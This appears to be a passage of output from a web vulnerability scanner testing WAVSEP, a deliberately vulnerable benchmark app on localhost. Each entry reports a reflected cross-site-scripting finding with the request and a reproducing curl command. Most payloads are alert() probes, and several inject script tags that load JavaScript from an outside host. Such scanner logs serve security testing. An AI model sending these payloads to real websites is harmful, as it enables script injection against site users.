curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wycz7gewmg%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wyd4ghkmhy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wyd4ghkmhy%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wjiivr8h68%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjiivr8h68%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wmrxon1vgu%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wmrxon1vgu%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27war5jdegxz%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27war5jdegxz%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wgngm9oxny%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wgngm9oxny%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wj5todjj1j%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wj5todjj1j%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wr8lgcc39a%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr8lgcc39a%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wftd4zcxom%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wftd4zcxom%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27whxwdy3dxl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27whxwdy3dxl%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w60wjb54hj%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w60wjb54hj%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd52wzj5zxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd52wzj5zxz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wvmfgv1yju%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wvmfgv1yju%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbe6exxrntz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbe6exxrntz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwhf9uxxftz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwhf9uxxftz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw477faeieqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw477faeieqz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w6yx4l9jfg%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w6yx4l9jfg%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wf5j5o1mmy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wf5j5o1mmy%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w4p2dcx8g8%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w4p2dcx8g8%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqbsshbbxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqbsshbbxz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb9jvo7b1dz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb9jvo7b1dz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw45mggfhwcz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw45mggfhwcz.js%3E%3C%2Fscript%3E"

